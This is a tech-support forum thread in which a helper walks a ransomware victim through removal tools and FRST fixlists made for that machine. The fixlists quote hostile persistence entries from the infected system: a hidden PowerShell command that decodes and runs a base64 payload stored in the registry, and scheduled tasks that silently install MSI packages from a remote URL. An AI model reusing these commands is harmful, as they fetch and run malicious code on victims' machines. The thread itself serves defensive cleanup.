rehman004

CLOSED Logs of the scan

Recommended Posts

Before we get started, I have one question.  Have files on your system been encrypted by Ransomware?

Share this post


Link to post
Share on other sites

Unfortunately, Satan Ransomware uses a secure encryption method, and cannot be decrypted without paying the ransom.

I can remove the infection itself, but that could result in the files being unencryptable, should you choose the pay the ransom.

Share this post


Link to post
Share on other sites

Do the following:

Download AdwCleaner and save it on your desktop.

  1. Close all open programs and Internet browsers (you may want to print our or write down these instructions first).
  2. Double click on adwcleaner.exe to run the tool.
  3. Click on the Scan button.
  4. After the scan has finished, click on the Clean button.
  5. Confirm each time with OK.
  6. You will be prompted to restart your computer. A text file will open in Notepad after the restart (this is the log of what was removed), which you can save on your desktop.
  7. Attach that log file to your reply by clicking the More Reply Options button to the lower-right of where you type in your reply.
    NOTE: If you lose that log file for any reason, you can find it at C:\AdwCleaner on your computer.


Download Junkware Removal Tool and save it on your desktop.

  1. Run the tool by double-clicking it.
  2. The tool will open and start scanning your system.
  3. Please be patient as this can take a while to complete depending on your system's specifications.
  4. On completion, a log is saved to your desktop and will automatically open.
  5. Attach the JRT log file to a reply by clicking the More Reply Options button to the lower-right of where you type in your reply.

Copy the below code to Notepad; Save As fixlist.txt to your Desktop.

(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
HKLM\...\Policies\Explorer\Run: [1679292484] => C:\ProgramData\msoorzitb.exe [99972736 2009-07-14] ()
HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1
HKU\S-1-5-21-2066707709-1942029407-343316037-1000\...\Run: [comrepl] => C:\Users\Grace\AppData\Roaming\com\comrepl.exe
HKU\S-1-5-21-2066707709-1942029407-343316037-1000\...\Run: [_Z2vçv7OWj.exe] => C:\Users\Grace\AppData\Local\Temp\{3db-7a-36-cf41d-b6bec-447b-2f589}\_Z2vçv7OWj.exe -r1_5 -r2_1 <===== ATTENTION
HKU\S-1-5-21-2066707709-1942029407-343316037-1000\...\Run: [{B8C2A9A9-8875-41C8-8FA7-B0167B60A1EB}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\pHlDYLhkMU').KYOOAG)));
HKU\S-1-5-21-2066707709-1942029407-343316037-1000\...\Policies\Explorer\Run: [NVIDIA Corporation] => C:\Users\Grace\AppData\Roaming\Microsoft\vtdajsst\gtbwvsis.exe
HKU\S-1-5-21-2066707709-1942029407-343316037-1000\...\Policies\Explorer\Run: [ocal AppWizard-Generated Applications] => C:\Users\Grace\AppData\Roaming\Microsoft\dwhvrfss\gtbwvsis.exe
HKU\S-1-5-21-2066707709-1942029407-343316037-1000\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
HKU\S-1-5-21-2066707709-1942029407-343316037-1000\...\MountPoints2: G - G:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-2066707709-1942029407-343316037-1000\...\MountPoints2: H - H:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-2066707709-1942029407-343316037-1000\...\MountPoints2: {24dceebf-cfd1-11e6-9b0f-00270e1a5fdb} - H:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-2066707709-1942029407-343316037-1000\...\MountPoints2: {7eb8e89c-49cf-11e6-b24c-00270e1a5fdb} - G:\HiSuiteDownLoader.exe
HKU\S-1-5-21-2066707709-1942029407-343316037-1000\...\MountPoints2: {99f09ae6-346e-11e6-997b-806e6f6e6963} - G:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-2066707709-1942029407-343316037-1000\...\MountPoints2: {9a1b9d76-41f6-11e6-93aa-00270e1a5fdb} - G:\HiSuiteDownLoader.exe
HKU\S-1-5-21-2066707709-1942029407-343316037-1000\...\MountPoints2: {ee39bf32-d036-11e6-9ebc-00270e1a5fdb} - G:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-18\Control Panel\Desktop\\SCRNSAVE.EXE -> 
HKLM\...\Providers\q90qys0i: C:\Program Files (x86)\Qerzitainckeriward Launcher\local64spl.dll
ShellExecuteHooks: No Name - {6710C780-E20E-4C49-A87D-321850ED3D7C} -  -> No File
ShellExecuteHooks: No Name - {AD722266-ECD2-11E6-BE37-64006A5CFC23} - C:\Program Files (x86)\Ckanesy\Pherluycogch.dll -> No File
ShellExecuteHooks: No Name - {7E8DA37A-ECD3-11E6-9EC2-64006A5CFC23} - C:\Users\Grace\AppData\Roaming\Reuquy\Shvoghgrash.dll -> No File
ShellExecuteHooks: No Name - {E076ADD8-EEB7-11E6-834F-64006A5CFC23} - C:\Users\Grace\AppData\Roaming\Drevosyvpoph\Qalalyvnity.dll -> No File
ShellExecuteHooks: No Name - {8A2A2C62-EEB8-11E6-9AB6-64006A5CFC23} - C:\Users\Grace\AppData\Roaming\Grjelyckojule\Coosak.dll -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ShellIconOverlayIdentifiers: [BaiduAntivirusIconLock] -> {0A93904A-BB1E-4a0c-9753-B57B9AE272CC} => C:\Program Files (x86)\Baidu Security\Baidu Antivirus\5.4.3.148966.0\BavShx64.dll -> No File
Startup: C:\Users\Grace\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer.lnk [2017-03-08]
ShortcutTarget: Explorer.lnk -> C:\Users\Grace\AppData\Local\Temp\F8FF.tmp.exe (No File)
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = 
SearchScopes: HKU\S-1-5-21-2066707709-1942029407-343316037-1000 -> ielnksrch URL = 
FF SearchPlugin: C:\Users\Grace\AppData\Roaming\Firefox\Firefox\Profiles\g0oplida.default\searchplugins\0_HELP_DECRYPT_FILES.html [2017-03-08]
S2 Themes; C:\Windows\system32\themeservice.dll [44544 2009-07-14] (Microsoft Corporation) [DependOnService: iThemes5]<==== ATTENTION
R2 WinSnare; C:\Users\Grace\AppData\Roaming\WinSnare\WinSnare.dll [776704 2017-03-10] (InterSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
2017-03-12 19:36 - 2017-03-12 19:36 - 00000000 ____D C:\Users\Grace\AppData\Roaming\Baidu
2017-03-11 00:56 - 2017-03-14 18:29 - 00000000 _____ C:\Users\Public\Documents\temp.dat
2017-03-08 14:32 - 2017-03-08 14:32 - 00023101 _____ C:\Users\Grace\Downloads\0_HELP_DECRYPT_FILES.html
2017-03-08 14:32 - 2017-03-08 14:32 - 00023101 _____ C:\Users\Grace\0_HELP_DECRYPT_FILES.html
2017-03-08 14:31 - 2017-03-08 14:31 - 00023101 _____ C:\Users\Grace\AppData\Roaming\0_HELP_DECRYPT_FILES.html
2017-03-07 23:06 - 2017-03-07 23:06 - 00023101 _____ C:\Users\Grace\AppData\Local\0_HELP_DECRYPT_FILES.html
2017-03-02 18:34 - 2017-03-02 18:34 - 00000000 _____ C:\Windows\SysWOW64\4
2017-03-02 18:34 - 2017-03-02 18:34 - 00000000 _____ C:\Windows\SysWOW64\3
2017-02-14 22:50 - 2017-02-14 22:51 - 00802104 _____ (Baidu Inc.) C:\Users\Grace\Downloads\Baidu_Cleaner_Setup_Mini_GL62.exe
2017-02-14 21:48 - 2017-03-12 19:37 - 00003544 _____ C:\Windows\System32\Tasks\060184C3-9766-46a0-B258-F4518A0B2633
2017-02-14 21:47 - 2017-02-14 23:00 - 00000000 ____D C:\Program Files (x86)\Baidu Security
2017-02-14 21:03 - 2017-03-12 00:21 - 00000000 ____D C:\ProgramData\Baidu
2017-02-14 21:03 - 2017-02-14 21:59 - 00000000 ____D C:\ProgramData\Baidu Security
2017-02-14 15:44 - 2017-02-14 15:44 - 00005988 _____ C:\Windows\System32\Tasks\Coitoy Manager
2017-02-14 15:09 - 2017-02-14 15:09 - 00005986 _____ C:\Windows\System32\Tasks\Gherotyreiferdom Engine
2017-02-14 15:04 - 2017-02-14 15:04 - 00005066 _____ C:\Windows\System32\Tasks\Coecapyzirucult
2017-02-12 12:16 - 2017-02-12 12:16 - 00003664 _____ C:\Windows\System32\Tasks\Wiqukreizasy
2017-02-12 12:11 - 2017-02-12 12:11 - 00006100 _____ C:\Windows\System32\Tasks\Qerzitainckeriward Launcher
2017-03-12 18:28 - 2017-03-14 15:46 - 0000114 _____ () C:\Program Files (x86)\metadata
2017-03-12 18:28 - 2017-03-14 18:28 - 0000040 _____ () C:\Program Files (x86)\settings.dat
2017-03-08 14:31 - 2017-03-08 14:31 - 0023101 _____ () C:\Users\Grace\AppData\Roaming\0_HELP_DECRYPT_FILES.html
2017-03-08 14:31 - 2017-03-08 14:31 - 0006368 _____ () C:\Users\Grace\AppData\Roaming\agguigfyowh.stn
2016-12-04 14:14 - 2016-12-04 14:14 - 1906409 _____ () C:\Users\Grace\AppData\Roaming\Blacktech.tst
2016-12-04 14:13 - 2016-12-04 14:13 - 0190394 _____ () C:\Users\Grace\AppData\Roaming\Dingair.bin
2017-03-08 14:31 - 2017-03-08 14:31 - 7311648 _____ () C:\Users\Grace\AppData\Roaming\ebo.stn
2017-03-08 14:31 - 2017-03-08 14:31 - 0071504 _____ () C:\Users\Grace\AppData\Roaming\hubuamvy.stn
2016-12-04 14:16 - 2016-12-04 14:16 - 1897568 _____ () C:\Users\Grace\AppData\Roaming\Meddox.bin
2017-03-07 17:48 - 2013-10-05 05:38 - 0970912 _____ (Microsoft Corporation) C:\Users\Grace\AppData\Roaming\msvcr120.dll
2017-03-08 14:31 - 2017-03-08 14:31 - 0019232 _____ () C:\Users\Grace\AppData\Roaming\ogyfasirygal.stn
2017-03-07 17:48 - 2017-03-06 13:18 - 1008128 _____ () C:\Users\Grace\AppData\Roaming\RuntimeBrocker.exe
2017-03-08 14:31 - 2017-03-08 14:31 - 0141088 _____ () C:\Users\Grace\AppData\Roaming\tyosywecikimc.stn
2017-03-08 14:31 - 2017-03-08 14:31 - 0127264 _____ () C:\Users\Grace\AppData\Roaming\x.stn
2017-03-08 14:31 - 2017-03-08 14:31 - 0017024 _____ () C:\Users\Grace\AppData\Roaming\zyahacibyzoxpaisbeacuwwoxeirdeuv.stn
2017-03-07 23:06 - 2017-03-07 23:06 - 0023101 _____ () C:\Users\Grace\AppData\Local\0_HELP_DECRYPT_FILES.html
2017-03-08 23:37 - 2017-03-08 23:37 - 1369792 _____ () C:\Users\Grace\AppData\Local\emzas.stn
2017-03-09 18:42 - 2017-03-09 18:42 - 0980992 _____ () C:\Users\Grace\AppData\Local\epsioncixeqeho.stn
2017-03-09 00:10 - 2017-03-09 00:10 - 0110416 _____ () C:\Users\Grace\AppData\Local\geywuzreuggyalahyfofsao.stn
2017-03-07 23:06 - 2017-03-07 23:06 - 0110416 _____ () C:\Users\Grace\AppData\Local\seqiuquswudaeboki.stn
2017-03-07 23:07 - 2017-03-07 23:07 - 0000816 _____ () C:\Users\Grace\AppData\Local\vu.stn
2017-03-08 14:24 - 2017-03-08 14:24 - 2932544 _____ () C:\Users\Grace\AppData\Local\vuuhyq.stn
2017-03-08 23:01 - 2017-03-08 23:01 - 1182896 _____ () C:\Users\Grace\AppData\Local\ybutyrtaiqetd.stn
2017-03-07 23:06 - 2017-03-07 23:06 - 2932304 _____ () C:\Users\Grace\AppData\Local\ynxi.stn
2016-02-07 21:26 - 2016-02-07 21:26 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2016-02-27 07:19 - 2017-02-14 23:03 - 0014501 _____ () C:\ProgramData\Duplicaterecord.js
2009-07-14 04:31 - 2009-07-14 06:14 - 99972736 ___SH () C:\ProgramData\msoorzitb.exe
C:\ProgramData\Duplicaterecord.js
C:\ProgramData\msoorzitb.exe
2017-03-06 13:55 - 2017-03-06 13:55 - 1098764 ___RH () C:\Users\Grace\AppData\Local\Temp\93D7.tmp.exe
2017-03-02 17:39 - 2017-03-02 17:39 - 1098417 ___RH () C:\Users\Grace\AppData\Local\Temp\C1F7.tmp.exe
2017-03-10 18:08 - 2009-07-14 06:15 - 0805376 _____ (Microsoft Corporation) C:\Users\Grace\AppData\Local\Temp\cdo1222616280.dll
2017-03-13 22:36 - 2009-07-14 06:15 - 0805376 _____ (Microsoft Corporation) C:\Users\Grace\AppData\Local\Temp\cdo2450072901.dll
2017-03-13 22:36 - 2009-07-14 06:15 - 0805376 _____ (Microsoft Corporation) C:\Users\Grace\AppData\Local\Temp\cdo3457795531.dll
2017-03-01 19:18 - 2017-03-01 19:18 - 1097502 ___RH () C:\Users\Grace\AppData\Local\Temp\DC5A.tmp.exe
2017-03-11 00:52 - 2017-03-11 00:52 - 0237736 _____ (Enigma Software Group USA, LLC.) C:\Users\Grace\AppData\Local\Temp\esg_cleanup.exeTask: {3A18EE8C-8DD6-4C33-A84A-832CA58FC9D7} - System32\Tasks\UCBrowserUpdaterCore => C:\Program Files (x86)\UCBrowser\Application\update_task.exe  <==== ATTENTION
Task: {40A24AB9-E582-4D81-8E4E-2147A1C6B488} - System32\Tasks\Plohis Adapter => C:\Program Files (x86)\Ckikution\plohisAdapterGrq.exe 
Task: {4C2D8775-206A-45BB-952B-94B119E8E89D} - System32\Tasks\Coitoy Manager => C:\Program Files (x86)\Ckerkak\phloge.exe 
Task: {5C24B58E-2A3F-4BB8-90E4-A2DDAD8E2472} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-03-11] ()
Task: {8BA8F394-7D1B-498D-B9FA-CAAE2929F68D} - System32\Tasks\060184C3-9766-46a0-B258-F4518A0B2633 => Cscript.exe "C:\ProgramData\Baidu Security\Duplicaterecord.js"
Task: {A1397936-158F-4134-AEBC-0C2D78977607} - System32\Tasks\UCBrowserUpdater => C:\Program Files (x86)\UCBrowser\Application\update_task.exe  <==== ATTENTION
Task: {B5B27CFF-37FC-4643-B0F3-B7B260325855} - System32\Tasks\Qerzitainckeriward Launcher => C:\Program Files (x86)\Ckanesy\ribuge.exe 
Task: {F249F686-ED40-4DF8-9661-F5AC0DC443C1} - System32\Tasks\{C7602EA3-B5DF-465F-A0B4-3F5DE00FF4A6} => Chrome.exe 
Task: {F5B0E0A7-5902-4BDE-B4B6-BBC08642BE67} - System32\Tasks\Coecapyzirucult => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=ST3250318AS_6VY5CBVRXXXX6VY5CBVR&amp;v=2017214 /q <==== ATTENTION
Task: {F6F9E79B-D695-4494-8F60-F779277955A7} - System32\Tasks\Wiqukreizasy => msiexec /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=ST3250318AS_6VY5CBVRXXXX6VY5CBVR&amp;v=2017212 /q <==== ATTENTION
Task: C:\Windows\Tasks\UCBrowserUpdater.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== ATTENTION
Task: C:\Windows\Tasks\UCBrowserUpdaterCore.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== ATTENTION
AlternateDataStreams: C:\Windows\system32\Drivers\gjvmersh.sys:changelist [1078]
C:\Users\Grace\AppData\Roaming\baidu

Close Notepad.

NOTE: It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST64 and press the Fix button just once and wait.

If the tool needed a restart please make sure you let the system restart normally and let the tool complete its run after restart.

The tool will make a log on the Desktop (Fixlog.txt). Attach it to your reply.

Note: If the tool warns you about an outdated version please download and run the updated version.

Share this post


Link to post
Share on other sites

If you still have fixlist.txt the FRST did not load it and run it.  Make sure that both FRST64.exe and fixlist.txt are in the same folder with each other. They are both supposed to be on the Windows Desktop.

Share this post


Link to post
Share on other sites

Let's take a fresh look.

Run fresh scans with Emsisoft Emergency Kit (EEK) and FRST, attach the new EEK and FRST scans to your reply.

Be sure to let me know how things are running.

Share this post


Link to post
Share on other sites

Copy the below code to Notepad; Save As fixlist.txt to your Desktop.

HKLM-x32\...\Winlogon: [Userinit] userinit.exe,,c:\program files (x86)\microsoft\desktoplayer.exe
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = 
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
2017-03-18 23:32 - 2017-03-18 23:32 - 00002932 _____ C:\Windows\System32\Tasks\{E7A9CD2E-5F47-4387-ACAF-B2176D41EAFE}
2017-03-18 23:14 - 2017-03-18 23:14 - 00002932 _____ C:\Windows\System32\Tasks\{D97B9E20-CC66-4388-A7B2-CB74241DC3B1}
2017-03-18 23:13 - 2017-03-18 23:13 - 00002932 _____ C:\Windows\System32\Tasks\{DB6F22AE-51BB-4733-8EA0-D05E5AC5A890}
2017-03-18 23:13 - 2017-03-18 23:13 - 00002932 _____ C:\Windows\System32\Tasks\{8A3AEBB3-9BC6-4C97-A040-CFBEC9EB145A}
2017-03-18 23:13 - 2017-03-18 23:13 - 00002932 _____ C:\Windows\System32\Tasks\{5CD2383A-6FED-4EFB-AC96-1BA9926F4EAC}
2017-03-18 23:13 - 2017-03-18 23:13 - 00002932 _____ C:\Windows\System32\Tasks\{44BF2A5B-1874-4B93-ACED-21A3A191D35F}
2017-03-18 23:11 - 2017-03-18 23:11 - 00002932 _____ C:\Windows\System32\Tasks\{7E42AB03-CA36-4049-B4E8-C8FC2E1D55B7}
2017-03-18 23:04 - 2017-03-18 23:04 - 00002932 _____ C:\Windows\System32\Tasks\{BD4B8FE2-3566-4579-9420-FEB386120F05}
2017-03-18 23:04 - 2017-03-18 23:04 - 00002932 _____ C:\Windows\System32\Tasks\{ADBFB934-6D29-4D6F-A702-7ACCC67E17BE}
2017-03-18 23:04 - 2017-03-18 23:04 - 00002932 _____ C:\Windows\System32\Tasks\{147B2BC0-848D-4330-BD91-BF990A30DF30}
2017-03-18 15:47 - 2017-03-20 17:45 - 0000310 _____ () C:\Program Files (x86)\metadata
2017-03-18 15:47 - 2017-03-21 17:41 - 0000040 _____ () C:\Program Files (x86)\settings.dat
2017-03-20 14:28 - 2017-03-20 14:28 - 0007605 _____ () C:\Users\Grace\AppData\Local\Resmon.ResmonCfg
2017-03-11 00:52 - 2017-03-11 00:52 - 0237736 _____ (Enigma Software Group USA, LLC.) C:\Users\Grace\AppData\Local\Temp\esg_cleanup.exe
2017-03-16 15:12 - 2017-03-16 15:12 - 0000000 _____ () C:\Users\Grace\AppData\Local\Temp\vlc-2.2.4-win32.exe
Task: {261AA4CD-31E2-4984-AFBC-CC35B1D272EA} - \Gherotyreiferdom Engine -> No File <==== ATTENTION
C:\Program Files (x86)\Common Files\Microsoft Shared\Help\0_HELP_DECRYPT_FILES.html
C:\Program Files (x86)\Common Files\Microsoft Shared\MSEnv\0_HELP_DECRYPT_FILES.html
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\0_HELP_DECRYPT_FILES.html
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE12\0_HELP_DECRYPT_FILES.html
C:\Program Files (x86)\Common Files\Microsoft Shared\Smart Tag\0_HELP_DECRYPT_FILES.html
C:\Program Files (x86)\Common Files\Microsoft Shared\Stationery\0_HELP_DECRYPT_FILES.html
C:\Program Files (x86)\Common Files\Microsoft Shared\TextConv\0_HELP_DECRYPT_FILES.html
C:\Program Files (x86)\Common Files\Services\0_HELP_DECRYPT_FILES.html
C:\Program Files (x86)\Common Files\System\ado\0_HELP_DECRYPT_FILES.html
C:\Program Files (x86)\Common Files\System\en-US\0_HELP_DECRYPT_FILES.html
C:\Program Files (x86)\Common Files\System\msadc\0_HELP_DECRYPT_FILES.html
C:\Program Files (x86)\Common Files\System\Ole DB\0_HELP_DECRYPT_FILES.html 
C:\Program Files (x86)\Internet Explorer\0_HELP_DECRYPT_FILES.html
C:\Program Files (x86)\MSBuild\0_HELP_DECRYPT_FILES.html
C:\Program Files (x86)\WinRAR\0_HELP_DECRYPT_FILES.html
C:\Program Files\Common Files\Microsoft Shared\Stationery\0_HELP_DECRYPT_FILES.html
C:\Program Files\Common Files\Services\0_HELP_DECRYPT_FILES.html
C:\Program Files\Common Files\System\ado\0_HELP_DECRYPT_FILES.html
C:\Program Files\Common Files\System\en-US\0_HELP_DECRYPT_FILES.html
C:\Program Files\Common Files\System\msadc\0_HELP_DECRYPT_FILES.html
C:\Program Files\Common Files\System\Ole DB\0_HELP_DECRYPT_FILES.html
C:\Program Files\Internet Explorer\0_HELP_DECRYPT_FILES.html
C:\Program Files\NVIDIA Corporation\0_HELP_DECRYPT_FILES.html
C:\ProgramData\Logic Handler\0_HELP_DECRYPT_FILES.html
C:\ProgramData\Microsoft Help\0_HELP_DECRYPT_FILES.html
C:\ProgramData\Microsoft\eHome\0_HELP_DECRYPT_FILES.html
C:\ProgramData\Microsoft\IlsCache\0_HELP_DECRYPT_FILES.html
C:\ProgramData\Microsoft\OFFICE\0_HELP_DECRYPT_FILES.html
C:\ProgramData\Microsoft\User Account Pictures\0_HELP_DECRYPT_FILES.html
C:\ProgramData\NVIDIA Corporation\GeForce Experience\0_HELP_DECRYPT_FILES.html
C:\ProgramData\NVIDIA Corporation\NetService\0_HELP_DECRYPT_FILES.html
C:\ProgramData\NVIDIA\0_HELP_DECRYPT_FILES.html
C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\0_HELP_DECRYPT_FILES.html
C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\0_HELP_DECRYPT_FILES.html
C:\ProgramData\SecuROM\DFA\0_HELP_DECRYPT_FILES.html
C:\ProgramData\Wondershare Video Editor\Resources\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\Adobe\Color\Profiles\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\CallofDuty4MW\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\CallofDuty4MW\players\profiles\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\CallofDuty4MW\updates\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017021810.000\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017021819.000\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017021912.000\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017022317.000\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017022617.000\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017022619.000\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017022708.000\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017022708.001\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017030217.000\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017030418.000\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017030610.000\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017030616.000\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017030616.001\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017030712.000\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017030818.000\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\ElevatedDiagnostics\460911090\2017030818.001\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\PunkBuster\COD4\pb\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\Temp\NVIDIA Corporation\NV_Cache\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Local\Wondershare\WSHelper\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Roaming\Microsoft\Clip Organizer\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Roaming\Microsoft\OIS\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Roaming\Microsoft\PowerPoint\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Roaming\Microsoft\Templates\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Roaming\Microsoft\UProof\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Roaming\Profiles\Kerhale.default\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Roaming\SecuROM\UserData\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Roaming\vlc\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Roaming\WinRAR\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Roaming\WinSAPSvc\0_HELP_DECRYPT_FILES.html
C:\Users\Grace\AppData\Roaming\WinSAPSvc\winsap_update\0_HELP_DECRYPT_FILES.html
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows Mail\Stationery\0_HELP_DECRYPT_FILES.html

Close Notepad.

NOTE: It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST64 and press the Fix button just once and wait.

If the tool needed a restart please make sure you let the system restart normally and let the tool complete its run after restart.

The tool will make a log on the Desktop (Fixlog.txt). Attach it to your reply.

Note: If the tool warns you about an outdated version please download and run the updated version.

Share this post


Link to post
Share on other sites

Changing tools:

Download RogueKiller from one of the following links and save it to your desktop:

  • Link 1
  • Link 2
    • Close all programs and disconnect any USB or external drives before running the tool.
    • Double-click RogueKiller.exe to run the tool (Vista/7/8/10 users: Right-click and select Run As Administrator).
    • Once the Prescan has finished, click Scan.
    • Once the Status box shows "Scan Finished", just close the program. <--Don't fix anything!
    • Attach the RogueKiller report to your next reply.
      • The log can also be found on your desktop labeled (RKreport[X]_S_xxdatexx_xtimex)
      • The highest number of [X], is the most recent Scan




Share this post


Link to post
Share on other sites
Guest
This topic is now closed to further replies.

  • Recently Browsing   0 members

    No registered users viewing this page.